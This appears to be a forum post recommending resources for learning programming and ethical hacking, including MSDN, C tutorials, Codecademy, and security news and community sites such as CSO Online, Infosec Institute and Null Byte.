-Choosing a programing language @ MSDN: In case you don’t know MSDN (Microsoft Developer Network), you’ll learn to rely on it while studying programming languages. This is a very interesting, though a bit outdated in terms of time and not contents, writing about choosing the programming language that fits to you. Although as a developer you should be able to work with multiple languages, it points you in the right direction, and also helps you to better understand low and high level programming, the differences and the features they offer.

-Introduction to programming in C, Podcast: Introduction to C and programming concepts and syntax.

Learning

-Learn C @ Learn-C.org: The C programming language is a basic knowledge that IMO everyone should have. My studies started with C, and C is still widely used today. Also deserving to be mentioned the languages C++ and C objective, which are currently used for many applications, e.g. iDevices applications are written in C objective.

-Code Academy: As initially suggested by CyberHitchHiker, this “Academy” is a very interesting and reliable resource to learn major web development and scripting languages like HTML, CSS, JS, Ruby and Python. Author_Hariom_Chaudhary_Advance_Ethical_Hacking_and_Cyber_Security_Boot_Camp_at_Delhi,_India

 

Post learning and hacking references

As suggested by ghost_, a useful way to get into the topic of hacking is frequenting “information security news sites, as it’s always good to stay in the know”.

-CSO Online: suggested by ghost_, this is a valuable reference for news about information security aimed to every security enthusiast.

-Infosec Institute: A huge documentation about hacking is hosted here, I recommend you to visit Infosec Institute.

-Null Byte: You can’t skip this one. This is the best community I’ve ever found about hacking, so go check every Linux Basics how-to (you should also have Bash knowledge), read this introduction to hacking and tools and you can start hacking like a pro (a thank to OTW for the time spent on these awesome posts)!

Warning: I only checked the validity of every reference I posted, not followed the actual courses, so if you notice something strange is going on with any reference, I’ll provide to remove them asap. If this post is somehow considered spam, please provide to remove it as soon as possible.